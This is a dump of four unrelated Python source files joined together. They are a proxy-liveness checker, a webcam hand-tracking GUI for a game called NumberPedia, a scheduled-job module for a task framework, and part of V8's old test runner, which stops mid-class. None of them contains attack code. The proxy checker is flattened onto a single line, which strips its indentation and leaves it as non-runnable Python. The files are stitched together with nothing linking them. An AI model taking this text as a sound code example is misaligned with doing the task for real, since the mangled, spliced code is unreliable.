#! /usr/bin/env python #-*- coding:utf-8 -*- import urllib2 import re import threading class TestProxy(object): def __init__(self): self.sFile = r'proxy.txt' self.dFile = r'alive.txt' self.URL = r'http://www.baidu.com' self.threads = 10 self.timeout = 3 self.regex = re.compile(r'baidu.com') self.aliveList = [] self.run() def run(self): with open(self.sFile, 'r') as fp: lines = fp.readlines() line = lines.pop() while lines: for i in xrange(self.threads): t = threading.Thread(target=self.linkWithProxy, args=(line,)) t.start() if lines: line = lines.pop() else: continue def linkWithProxy(self, line): lineList = line.split('\t') protocol = lineList[2].lower() server = protocol + r'://' + lineList[0] + ':' + lineList[1] opener = urllib2.build_opener(urllib2.ProxyHandler({protocol:server})) urllib2.install_opener(opener) try: response = urllib2.urlopen(self.URL, timeout=self.timeout) except: print('%s connect failed' %server) return else: try: str = response.read() except: print('%s connect failed' % server) return if self.regex.search(str): print('%s connect sucess ......' % server) self.aliveList.append(line) with open(self.dFile, 'a') as fp: fp.write(line) if __name__=="__main__": TP = TestProxy()
NumberPedia-HandTracking.py
#gui
from msilib.schema import Font
from tkinter import *
from tkinter import ttk
from tkinter.font import Font
import cv2, os, pygame.image, pygame.camera
#tracking
from cvzone.HandTrackingModule import HandDetector
from cvzone.ColorModule import ColorFinder
from cvzone import FPS
import GeneralAttribute, PacketSender, UDPDataSender
import os, cv2, numpy as np, pyautogui, threading, cvzone, imutils, socket


def SetupNotification(content, position):
    # Show *content* in the shared status label at horizontal offset *position*.
    lblNotif.config(text=content)
    lblNotif.place(x=position)


def StartExWebcam(index):
    """Open camera *index* and start the tracker selected in the GUI."""
    global cap, scaleSet, webcamStatus
    cap = cv2.VideoCapture(index)
    if int(trackingType.get()) == 1:
        HandVisualizing()
    elif int(trackingType.get()) == 2:
        # Ball tracking is intentionally disabled for now.
        #BallColorVisualizing()
        webcamStatus = False
        exWebcamButton(True)
        SetupNotification("Ball Tracking Feature Still Under Maintenance!", 130)


def ValidationInputExWebcam():
    """Resolve the combobox selection to a camera index and start it."""
    global webcamStatus
    if comboWebcam.get() != "Select Your Camera":
        for i in range(0, len(list_cam)):
            if comboWebcam.get() == list_cam[i]:
                StartExWebcam(i)
    else:
        webcamStatus = False
        exWebcamButton(True)
        SetupNotification("Please Select Your External Webcam!", 150)


def ScaleSetting(x):
    # Trackbar callback: trackbar values are negative, so negate to get the
    # positive zoom factor used by the crop math.
    global scaleSet
    scaleSet = -x


def BrigtnessSetting(x):
    # Trackbar callback placeholder — brightness is not applied yet.
    print(x)


def BallCircleVisualizing():
    """Track a green ball via HSV threshold + min enclosing circle (Esc quits)."""
    global cap, scaleSet, webcamStatus
    SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100)
    GeneralAttribute.isRun = True
    # Background thread streams tracked positions over UDP to the game.
    thread_sender = threading.Thread(target=UDPDataSender.SendingPacket)
    thread_sender.start()
    widthScreen, heightScreen = pyautogui.size()
    winName = 'NumberPedia-HandTracking'
    # HSV bounds for "green".
    greenLower = (29, 86, 6)
    greenUpper = (64, 255, 255)
    fpsReader = FPS()
    cap.set(3, 1280)
    cap.set(4, 720)
    cv2.namedWindow(winName)
    cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting)
    cv2.setTrackbarMin('Zoom Scalling', winName, -50)
    cv2.setTrackbarMax('Zoom Scalling', winName, -1)
    cv2.setTrackbarPos('Zoom Scalling', winName, -50)
    while True:
        success, img = cap.read()
        #get the webcam size
        height, width, channels = img.shape
        #prepare the crop
        centerX, centerY = int(height/2), int(width/2)
        radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100)
        minX, maxX = centerX - radiusX, centerX + radiusX
        minY, maxY = centerY - radiusY, centerY + radiusY
        cropped = img[minX:maxX, minY:maxY]
        resized_cropped = cv2.resize(cropped, (width, height))
        result = imutils.resize(resized_cropped, width=600)
        hsv = cv2.cvtColor(result, cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv, greenLower, greenUpper)
        # Erode/dilate to clean up speckle noise in the mask.
        mask = cv2.erode(mask, None, iterations=2)
        mask = cv2.dilate(mask, None, iterations=2)
        cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2]
        center = None
        if len(cnts) > 0:
            # Largest contour is assumed to be the ball.
            c = max(cnts, key=cv2.contourArea)
            ((x, y), radius) = cv2.minEnclosingCircle(c)
            if radius > 10:
                cv2.circle(result, (int(x), int(y)), int(radius), (0, 255, 255), 2)
        #result = cv2.resize(result, (0, 0), None, 0.7, 0.7)
        cv2.imshow(winName, result)
        # Esc closes the camera and resets GUI state.
        if cv2.waitKey(1) & 0xFF == 27:
            cap.release()
            cv2.destroyAllWindows()
            GeneralAttribute.isRun = False
            webcamStatus = False
            SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105)
            exWebcamButton(True)
            break


def BallColorVisualizing():
    """Track a colored ball with cvzone's ColorFinder (Esc quits)."""
    global cap, scaleSet, webcamStatus
    SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100)
    GeneralAttribute.isRun = True
    thread_sender = threading.Thread(target=UDPDataSender.SendingPacket)
    thread_sender.start()
    widthScreen, heightScreen = pyautogui.size()
    winName = 'NumberPedia-HandTracking'
    fpsReader = FPS()
    cap.set(3, 1280)
    cap.set(4, 720)
    cv2.namedWindow(winName)
    cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting)
    cv2.setTrackbarMin('Zoom Scalling', winName, -50)
    cv2.setTrackbarMax('Zoom Scalling', winName, -1)
    cv2.setTrackbarPos('Zoom Scalling', winName, -50)
    success, img = cap.read()
    h, w, _ = img.shape
    myColorFinder = ColorFinder(False)
    # Tuned HSV range for the target ball color.
    hsvVals = {'hmin': 33, 'smin': 72, 'vmin': 126, 'hmax': 58, 'smax': 255, 'vmax': 255}
    while True:
        success, img = cap.read()
        #get the webcam size
        height, width, channels = img.shape
        #prepare the crop
        centerX, centerY = int(height/2), int(width/2)
        radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100)
        minX, maxX = centerX - radiusX, centerX + radiusX
        minY, maxY = centerY - radiusY, centerY + radiusY
        cropped = img[minX:maxX, minY:maxY]
        resized_cropped = cv2.resize(cropped, (width, height))
        # Apply the flip mode chosen in the GUI checkboxes.
        # NOTE(review): if no checkbox is set, `result` is unbound below.
        if isNormal.get() == True:
            result = resized_cropped
        elif isVertical.get() == True and isHorizontal.get() == True:
            resultTemp = cv2.flip(resized_cropped, 0)
            result = cv2.flip(resultTemp, 1)
        elif isVertical.get() == True:
            result = cv2.flip(resized_cropped, 0)
        elif isHorizontal.get() == True:
            result = cv2.flip(resized_cropped, 1)
        imgColor, mask = myColorFinder.update(result, hsvVals)
        result, contours = cvzone.findContours(result, mask)
        if contours:
            for index, ball_landmark in enumerate(contours):
                disallowed_characters = "( )"
                totalBall = index
                if index == 0:
                    # "x,y,area" with y flipped to screen coordinates.
                    data = f"{contours[0]['center'][0]},{h - contours[0]['center'][1]},{int(contours[0]['area'])}"
                    for char in disallowed_characters:
                        data = data.replace(char, "")
                    #print(f"{index},{data}")
        #imgStack = cvzone.stackImages([imgContour, imgColor], 1, 0.5)
        #cv2.imshow(winName, imgStack)
        result = cv2.resize(result, (0, 0), None, 0.7, 0.7)
        cv2.imshow(winName, result)
        if cv2.waitKey(1) & 0xFF == 27:
            cap.release()
            cv2.destroyAllWindows()
            GeneralAttribute.isRun = False
            webcamStatus = False
            SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105)
            exWebcamButton(True)
            break


def HandVisualizing():
    """Track up to 4 hands and publish their centers via GeneralAttribute (Esc quits)."""
    global cap, scaleSet, webcamStatus
    SetupNotification("Your Camera Opened. Setup It and Launch The Game!", 100)
    GeneralAttribute.isRun = True
    thread_sender = threading.Thread(target=UDPDataSender.SendingPacket)
    thread_sender.start()
    widthScreen, heightScreen = pyautogui.size()
    winName = 'NumberPedia-HandTracking'
    fpsReader = FPS()
    cap.set(3, 1280)
    cap.set(4, 720)
    detector = HandDetector(detectionCon=0.8, maxHands=4)
    hands_array = np.empty(10, dtype=object)
    cv2.namedWindow(winName)
    cv2.createTrackbar('Zoom Scalling', winName, 1, 100, ScaleSetting)
    cv2.setTrackbarMin('Zoom Scalling', winName, -50)
    cv2.setTrackbarMax('Zoom Scalling', winName, -1)
    cv2.setTrackbarPos('Zoom Scalling', winName, -50)
    cv2.createTrackbar('Brightness Adjustment', winName, 0, 100, BrigtnessSetting)
    while True:
        totalHand = 0
        success, img = cap.read()
        #get the webcam size
        height, width, channels = img.shape
        #prepare the crop
        centerX, centerY = int(height/2), int(width/2)
        radiusX, radiusY = int(scaleSet * height/100), int(scaleSet * width/100)
        minX, maxX = centerX - radiusX, centerX + radiusX
        minY, maxY = centerY - radiusY, centerY + radiusY
        cropped = img[minX:maxX, minY:maxY]
        resized_cropped = cv2.resize(cropped, (width, height))
        # Apply the flip mode chosen in the GUI checkboxes.
        if isNormal.get() == True:
            result = resized_cropped
        elif isVertical.get() == True and isHorizontal.get() == True:
            resultTemp = cv2.flip(resized_cropped, 0)
            result = cv2.flip(resultTemp, 1)
        elif isVertical.get() == True:
            result = cv2.flip(resized_cropped, 0)
        elif isHorizontal.get() == True:
            result = cv2.flip(resized_cropped, 1)
        hands, result = detector.findHands(result)  # With Draw
        # hands = detector.findHands(img, draw=False)  # No Draw
        if hands:
            # Build "count,x1,y1[,x2,y2...]" in GeneralAttribute.positionHand;
            # parentheses and spaces from the tuple repr are stripped.
            for index, hand_landmark in enumerate(hands):
                hands_array[index] = hands[index]
                disallowed_characters = "( )"
                totalHand = index
                if index == 0:
                    position_index_1 = str(hands_array[0]["center"])
                    GeneralAttribute.positionHand = f"{index + 1},{position_index_1}"
                    for char in disallowed_characters:
                        GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "")
                elif index == 1:
                    position_index_1 = str(hands_array[0]["center"])
                    position_index_2 = str(hands_array[1]["center"])
                    GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2}"
                    for char in disallowed_characters:
                        GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "")
                elif index == 2:
                    position_index_1 = str(hands_array[0]["center"])
                    position_index_2 = str(hands_array[1]["center"])
                    position_index_3 = str(hands_array[2]["center"])
                    GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2},{position_index_3}"
                    for char in disallowed_characters:
                        GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "")
                elif index == 3:
                    position_index_1 = str(hands_array[0]["center"])
                    position_index_2 = str(hands_array[1]["center"])
                    position_index_3 = str(hands_array[2]["center"])
                    position_index_4 = str(hands_array[3]["center"])
                    GeneralAttribute.positionHand = f"{index + 1},{position_index_1},{position_index_2},{position_index_3},{position_index_4}"
                    for char in disallowed_characters:
                        GeneralAttribute.positionHand = GeneralAttribute.positionHand.replace(char, "")
                #sock.sendto(str.encode(str(GeneralAttribute.positionHand)), serverAddressPort)
        else:
            GeneralAttribute.positionHand = ""
        # On-screen HUD.
        cv2.putText(result, f'Esc To Stop Camera', (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2)
        cv2.putText(result, f'Slide To Right For Scalling Camera Zoom', (50, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
        fps, img = fpsReader.update(result,pos=(50, 610),color=(128,0,0),scale=1.5,thickness=2)
        cv2.putText(result, f'Sending: {GeneralAttribute.positionHand}', (50, 640), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2)
        cv2.putText(result, f'Total Hand Detected: {totalHand + 1}', (50, 670), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 128), 2)
        result = cv2.resize(result, (0, 0), None, 0.7, 0.7)
        cv2.imshow(winName, result)
        if cv2.waitKey(1) == 27:
            cap.release()
            cv2.destroyAllWindows()
            GeneralAttribute.isRun = False
            webcamStatus = False
            SetupNotification("Setup and Start Webcam First! Then Launch The Game", 105)
            exWebcamButton(True)
            break


def GetListWebcam():
    # Enumerate attached cameras with pygame and fill the combobox source list.
    pygame.camera.init()
    cameras = pygame.camera.list_cameras()
    totalCamera = len(cameras)
    for i in range(0, totalCamera):
        list_cam.append(str(cameras[i]))


#define capture device
cap = None
webcamStatus = False
list_cam = list()
GetListWebcam()
#sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#serverAddressPort = ("127.0.0.1", 5053)

# Main window.
root = Tk()
root.title("NumberPedia")
root.geometry("550x350")
root.resizable(0, 0)
#import gui
img_logoNumberPedia = PhotoImage(file='Assets/ico_logo.png')
img_handEmoji = PhotoImage(file='Assets/ico_handemoji.png')
img_ballEmoji = PhotoImage(file='Assets/ico_ballemoji.png')
img_toggle_ex = PhotoImage(file='Assets/ico_toggleoff.png')
img_launchGame = PhotoImage(file='Assets/ico_launchgame.png')
header1_font = Font(family="Poppins", size=12)
header2_font = Font(family="Poppins", size=10)
#setting gui
lblLogo = Label(root, image=img_logoNumberPedia)
lblLogo.place(x=275 - img_logoNumberPedia.width() / 2, y=75 - img_logoNumberPedia.height() / 2)
lblTracking = Label(root, text="Tracking Type", font=header1_font)
lblTracking.place(x=35, y=150)
lblWebcam = Label(root, text="Flipping Type", font=header1_font)
lblWebcam.place(x=35, y=185)
lblWebcam = Label(root, text="External Webcam", font=header1_font)
lblWebcam.place(x=35, y=220)
#tracking type
trackingType = IntVar()
trackingType.set(1)
trackingHand = Radiobutton(root, text="Hand Tracking", font=header2_font, variable=trackingType, value=1, image=img_handEmoji, compound='left')
trackingHand.place(x=205, y=150)
trackingBall = Radiobutton(root, text="Ball Tracking", font=header2_font, variable=trackingType, value=2, image=img_ballEmoji, compound='left')
trackingBall.place(x=380, y=150)
#flip type
isNormal = BooleanVar()
isVertical = BooleanVar()
isHorizontal = BooleanVar()
flipNormal = Checkbutton(root, text="Normal", font=header2_font, variable=isNormal, onvalue=True, offvalue=False)
flipNormal.place(x=205, y=185)
flipNormal.select()
flipVertical = Checkbutton(root, text="Vertically", font=header2_font, variable=isVertical, onvalue=True, offvalue=False)
flipVertical.place(x=285, y=185)
flipHorizontal = Checkbutton(root, text="Horizontally", font=header2_font, variable=isHorizontal, onvalue=True, offvalue=False)
flipHorizontal.place(x=380, y=185)


#external cam
def exWebcamButton(index):
    """Toggle-button handler for the webcam switch.

    index == True  -> request OFF (or complain if a camera is running);
    index == False -> request ON: validate the flip checkboxes, then start
    the camera on a background thread.
    """
    global webcamStatus
    if index == True:
        if webcamStatus == True:
            # Camera loop owns the device; it must be closed with Esc first.
            SetupNotification("Please Close Your Webcam With Esc Button!", 130)
        else:
            webcamStatus = False
            img_toggle_ex.configure(file='Assets/ico_toggleoff.png')
            btnExWebcam.configure(command=lambda:exWebcamButton(False))
    elif index == False:
        webcamStatus = True
        img_toggle_ex.configure(file='Assets/ico_toggleon.png')
        btnExWebcam.configure(command=lambda:exWebcamButton(True))
        # "Normal" is mutually exclusive with the two flip options.
        if isNormal.get() == True and isVertical.get() == True or isNormal.get() == True and isHorizontal.get() == True:
            webcamStatus = False
            exWebcamButton(True)
            SetupNotification("You Only Choose Normal Or Set Horizontal And Vertical!", 100)
        elif isNormal.get() == isVertical.get() == isHorizontal.get() == False:
            webcamStatus = False
            exWebcamButton(True)
            SetupNotification("Please Select One Of Flip Type Above!", 150)
        else:
            SetupNotification("Loading... Please Wait!", 200)
            # Camera validation/open runs off the Tk main thread.
            thread_webcam = threading.Thread(target=lambda:ValidationInputExWebcam())
            thread_webcam.start()


comboWebcam = ttk.Combobox(root, value=list_cam, width=25)
comboWebcam.set("Select Your Camera")
comboWebcam.place(x=200, y=225)
lblExWebcam = Label(root, text="Start?", font=header2_font)
lblExWebcam.place(x=400, y=222)
btnExWebcam = Button(root, image=img_toggle_ex, border=0, command=lambda:exWebcamButton(False))
btnExWebcam.place(x=465, y=228)


#game
def ThreadForGame():
    # Launch the game on a worker thread only once the webcam is running.
    global webcamStatus
    if webcamStatus == True:
        thread_game = threading.Thread(target=PlayTheGame)
        thread_game.start()
    else:
        SetupNotification("Setup The Webcam First, Please!", 170)


def PlayTheGame():
    # Resolve NumberPedia.exe relative to this script's parent directory and
    # run it (blocking until the game exits).
    root_directory = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    root_directory = os.path.join(root_directory, 'NumberPedia', 'NumberPedia.exe')
    game_directory = root_directory.replace("\\", "/")
    os.system(game_directory)
    #print(game_directory)


btnLaunchGame = Button(root, image=img_launchGame, border=0, command=lambda:ThreadForGame())
btnLaunchGame.place(x=275 - img_launchGame.width() / 2, y=275 - img_launchGame.height() / 2)
#notif
lblNotif = Label(root, text="Setup and Start Webcam First! Then Launch The Game", fg="red", font= header2_font)
lblNotif.place(x=105,y=300)
root.mainloop()
__init__.py
"""
Integrated timed-task (scheduled job) support.
"""
import time
from typing import Union
import threading
from apscheduler.schedulers.background import BackgroundScheduler
# noinspection PyProtectedMember
from apscheduler.util import undefined
from function_scheduling_distributed_framework import frame_config
from function_scheduling_distributed_framework.consumers.base_consumer import AbstractConsumer


def timing_publish_deco(consuming_func_decorated_or_consumer: Union[callable, AbstractConsumer]):
    """Wrap a consume function (or consumer) so a scheduler job publishes to its queue.

    The returned callable, when fired by APScheduler, pushes the job's
    args/kwargs onto the queue instead of executing the function directly.
    """
    def _deco(*args, **kwargs):
        if getattr(consuming_func_decorated_or_consumer, 'is_decorated_as_consume_function', False) is True:
            consuming_func_decorated_or_consumer.push(*args, **kwargs)
        elif isinstance(consuming_func_decorated_or_consumer, AbstractConsumer):
            consuming_func_decorated_or_consumer.publisher_of_same_queue.push(*args, **kwargs)
        else:
            raise TypeError('consuming_func_decorated_or_consumer 必须是被 task_deco 装饰的函数或者consumer类型')
    return _deco


class FsdfBackgroundScheduler(BackgroundScheduler):
    """
    Customized scheduler: adds an add_timing_publish_job method.
    """

    # noinspection PyShadowingBuiltins
    def add_timing_publish_job(self, func, trigger=None, args=None, kwargs=None, id=None, name=None,
                               misfire_grace_time=undefined, coalesce=undefined, max_instances=undefined,
                               next_run_time=undefined, jobstore='default', executor='default',
                               replace_existing=False, **trigger_args):
        # Same signature as add_job, but the scheduled callable publishes to
        # the consume function's queue rather than running it in-process.
        return self.add_job(timing_publish_deco(func), trigger, args, kwargs, id, name,
                            misfire_grace_time, coalesce, max_instances, next_run_time,
                            jobstore, executor, replace_existing, **trigger_args)

    def start(self):
        def _block_exit():
            # Sleep forever so the process does not exit while jobs run.
            while True:
                time.sleep(3600)

        # Neither want BlockingScheduler to block the main process, nor want
        # the process to exit on a timer — run the keep-alive in a thread.
        threading.Thread(target=_block_exit).start()
        super(FsdfBackgroundScheduler, self).start()
        # _block_exit()  # On Python 3.9+ daemon-thread shutdown requires the
        # main thread to still be running, otherwise it terminates at the end.


# Module-level singleton scheduler, using the framework's configured timezone.
fsdf_background_scheduler = FsdfBackgroundScheduler(timezone=frame_config.TIMEZONE)
# fsdf_background_scheduler = FsdfBackgroundScheduler()

if __name__ == '__main__':
    # Demo: consume on a timed schedule.
    import datetime
    from function_scheduling_distributed_framework import task_deco, BrokerEnum, fsdf_background_scheduler, timing_publish_deco

    @task_deco('queue_test_666', broker_kind=BrokerEnum.LOCAL_PYTHON_QUEUE)
    def consume_func(x, y):
        print(f'{x} + {y} = {x + y}')

    # Timed: publish every 3 seconds.
    fsdf_background_scheduler.add_job(timing_publish_deco(consume_func),
                                      'interval', id='3_second_job', seconds=3, kwargs={"x": 5, "y": 6})
    # Timed: publish exactly once.
    fsdf_background_scheduler.add_job(timing_publish_deco(consume_func),
                                      'date', run_date=datetime.datetime(2020, 7, 24, 13, 53, 6), args=(5, 6,))
    # Timed: publish every day at 18:22:20.
    fsdf_background_scheduler.add_timing_publish_job(consume_func,
                                                     'cron', day_of_week='*', hour=18, minute=22, second=20, args=(5, 6,))
    # Start the scheduler.
    fsdf_background_scheduler.start()
    # Start consuming.
    consume_func.consume()
test.py
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
import imp
import optparse
import os
from os.path import join, dirname, abspath, basename, isdir, exists
import platform
import re
import signal
import subprocess
import sys
import tempfile
import time
import threading
import utils

from Queue import Queue, Empty


VERBOSE = False


# ---------------------------------------------
# --- P r o g r e s s   I n d i c a t o r s ---
# ---------------------------------------------


class ProgressIndicator(object):
  """Base class driving a pool of worker threads over a queue of test cases.

  Subclasses implement Starting/Done/AboutToRun/HasRun to report progress.
  Shared counters (succeeded, remaining, failed, crashed) are guarded by
  self.lock; the case queue itself is a thread-safe Queue.
  """

  def __init__(self, cases):
    self.cases = cases
    # Pre-fill the work queue; capacity == len(cases) so put_nowait never blocks.
    self.queue = Queue(len(cases))
    for case in cases:
      self.queue.put_nowait(case)
    self.succeeded = 0
    self.remaining = len(cases)
    self.total = len(cases)
    self.failed = [ ]
    self.crashed = 0
    # Cooperative shutdown flag polled by the worker loops.
    self.terminate = False
    self.lock = threading.Lock()

  def PrintFailureHeader(self, test):
    """Print the '===' banner and path for a failing test."""
    if test.IsNegative():
      negative_marker = '[negative] '
    else:
      negative_marker = ''
    print "=== %(label)s %(negative)s===" % {
      'label': test.GetLabel(),
      'negative': negative_marker
    }
    print "Path: %s" % "/".join(test.path)

  def Run(self, tasks):
    """Run all queued cases on `tasks` parallel workers; return True on success."""
    self.Starting()
    threads = []
    # Spawn N-1 threads and then use this thread as the last one.
    # That way -j1 avoids threading altogether which is a nice fallback
    # in case of threading problems.
    for i in xrange(tasks - 1):
      thread = threading.Thread(target=self.RunSingle, args=[])
      threads.append(thread)
      thread.start()
    try:
      self.RunSingle()
      # Wait for the remaining threads
      for thread in threads:
        # Use a timeout so that signals (ctrl-c) will be processed.
        thread.join(timeout=10000000)
    except Exception, e:
      # If there's an exception we schedule an interruption for any
      # remaining threads.
      self.terminate = True
      # ...and then reraise the exception to bail out
      raise
    self.Done()
    return not self.failed

  def RunSingle(self):
    """Worker loop: pull cases off the queue and run them until empty or told to stop."""
    while not self.terminate:
      try:
        test = self.queue.get_nowait()
      except Empty:
        # Queue drained: this worker is done.
        return
      case = test.case
      # Serialize progress output with the other workers.
      self.lock.acquire()
      self.AboutToRun(case)
      self.lock.release()
      try:
        start = time.time()
        output = case.Run()
        case.duration = (time.time() - start)
      except BreakNowException:
        # Raised by TestCase.Run on ctrl-c / IO failure; ask everyone to stop.
        self.terminate = True
      except IOError, e:
        # Expected only during shutdown (temp files going away).
        assert self.terminate
        return
      if self.terminate:
        return
      # Update shared counters under the lock.
      self.lock.acquire()
      if output.UnexpectedOutput():
        self.failed.append(output)
        if output.HasCrashed():
          self.crashed += 1
      else:
        self.succeeded += 1
      self.remaining -= 1
      self.HasRun(output)
      self.lock.release()


def EscapeCommand(command):
  """Join a command argv into a display string, quoting args that contain spaces."""
  parts = []
  for part in command:
    if ' ' in part:
      # Escape spaces and double quotes. We may need to escape more characters
      # for this to work properly.
      parts.append('"%s"' % part.replace('"', '\\"'))
    else:
      parts.append(part)
  return " ".join(parts)


class SimpleProgressIndicator(ProgressIndicator):
  """Line-oriented progress output; base for the 'verbose' and 'dots' styles."""

  def Starting(self):
    print 'Running %i tests' % len(self.cases)

  def Done(self):
    """Print per-failure details followed by a summary banner."""
    print
    for failed in self.failed:
      self.PrintFailureHeader(failed.test)
      if failed.output.stderr:
        print "--- stderr ---"
        print failed.output.stderr.strip()
      if failed.output.stdout:
        print "--- stdout ---"
        print failed.output.stdout.strip()
      print "Command: %s" % EscapeCommand(failed.command)
      if failed.HasCrashed():
        print "--- CRASHED ---"
      if failed.HasTimedOut():
        print "--- TIMEOUT ---"
    if len(self.failed) == 0:
      print "==="
      print "=== All tests succeeded"
      print "==="
    else:
      print
      print "==="
      print "=== %i tests failed" % len(self.failed)
      if self.crashed > 0:
        print "=== %i tests CRASHED" % self.crashed
      print "==="


class VerboseProgressIndicator(SimpleProgressIndicator):
  """One 'Starting'/'Done running' line per test."""

  def AboutToRun(self, case):
    print 'Starting %s...' % case.GetLabel()
    sys.stdout.flush()

  def HasRun(self, output):
    if output.UnexpectedOutput():
      if output.HasCrashed():
        outcome = 'CRASH'
      else:
        outcome = 'FAIL'
    else:
      outcome = 'pass'
    print 'Done running %s: %s' % (output.test.GetLabel(), outcome)


class DotsProgressIndicator(SimpleProgressIndicator):
  """One character per test: '.' pass, 'F' fail, 'C' crash, 'T' timeout."""

  def AboutToRun(self, case):
    pass

  def HasRun(self, output):
    total = self.succeeded + len(self.failed)
    # Wrap the dot row every 50 tests.
    if (total > 1) and (total % 50 == 1):
      sys.stdout.write('\n')
    if output.UnexpectedOutput():
      if output.HasCrashed():
        sys.stdout.write('C')
        sys.stdout.flush()
      elif output.HasTimedOut():
        sys.stdout.write('T')
        sys.stdout.flush()
      else:
        sys.stdout.write('F')
        sys.stdout.flush()
    else:
      sys.stdout.write('.')
      sys.stdout.flush()


class CompactProgressIndicator(ProgressIndicator):
  """Single rewritten status line; base for 'color' and 'mono' styles.

  `templates` supplies the status-line, stdout and stderr format strings.
  """

  def __init__(self, cases, templates):
    super(CompactProgressIndicator, self).__init__(cases)
    self.templates = templates
    # Length of the last status line, needed to blank it before rewriting.
    self.last_status_length = 0
    self.start_time = time.time()

  def Starting(self):
    pass

  def Done(self):
    self.PrintProgress('Done')

  def AboutToRun(self, case):
    self.PrintProgress(case.GetLabel())

  def HasRun(self, output):
    # Only failures produce persistent output; passes just update the line.
    if output.UnexpectedOutput():
      self.ClearLine(self.last_status_length)
      self.PrintFailureHeader(output.test)
      stdout = output.output.stdout.strip()
      if len(stdout):
        print self.templates['stdout'] % stdout
      stderr = output.output.stderr.strip()
      if len(stderr):
        print self.templates['stderr'] % stderr
      print "Command: %s" % EscapeCommand(output.command)
      if output.HasCrashed():
        print "--- CRASHED ---"
      if output.HasTimedOut():
        print "--- TIMEOUT ---"

  def Truncate(self, str, length):
    # Clip to `length` with a trailing ellipsis so the status fits one line.
    if length and (len(str) > (length - 3)):
      return str[:(length-3)] + "..."
    else:
      return str

  def PrintProgress(self, name):
    """Rewrite the in-place status line with elapsed time, % done, and counts."""
    self.ClearLine(self.last_status_length)
    elapsed = time.time() - self.start_time
    status = self.templates['status_line'] % {
      'passed': self.succeeded,
      # Percentage of cases already taken off the queue.
      'remaining': (((self.total - self.remaining) * 100) // self.total),
      'failed': len(self.failed),
      'test': name,
      'mins': int(elapsed) / 60,
      'secs': int(elapsed) % 60
    }
    # 78 columns keeps the line from wrapping on an 80-column terminal.
    status = self.Truncate(status, 78)
    self.last_status_length = len(status)
    print status,
    sys.stdout.flush()


class ColorProgressIndicator(CompactProgressIndicator):
  """Compact indicator using ANSI color escapes."""

  def __init__(self, cases):
    templates = {
      'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
      'stdout': "\033[1m%s\033[0m",
      'stderr': "\033[31m%s\033[0m",
    }
    super(ColorProgressIndicator, self).__init__(cases, templates)

  def ClearLine(self, last_line_length):
    # ANSI erase-to-start-of-line, then carriage return.
    print "\033[1K\r",


class MonochromeProgressIndicator(CompactProgressIndicator):
  """Compact indicator without color escapes (plain terminals, logs)."""

  def __init__(self, cases):
    templates = {
      'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
      'stdout': '%s',
      'stderr': '%s',
    }
    super(MonochromeProgressIndicator, self).__init__(cases, templates)

  def ClearLine(self, last_line_length):
    # Overwrite the previous status with spaces, then return to column 0.
    print ("\r" + (" " * last_line_length) + "\r"),


# Maps the --progress option value to its indicator class.
PROGRESS_INDICATORS = {
  'verbose': VerboseProgressIndicator,
  'dots': DotsProgressIndicator,
  'color': ColorProgressIndicator,
  'mono': MonochromeProgressIndicator
}


# -------------------------
# --- F r a m e w o r k ---
# -------------------------


class BreakNowException(Exception):
  """Raised to abort the whole test run (e.g. on ctrl-c in a worker)."""

  def __init__(self, value):
    self.value = value

  def __str__(self):
    return repr(self.value)


class CommandOutput(object):
  """Raw result of running one subprocess: exit code, timeout flag, streams."""

  def __init__(self, exit_code, timed_out, stdout, stderr):
    self.exit_code = exit_code
    self.timed_out = timed_out
    self.stdout = stdout
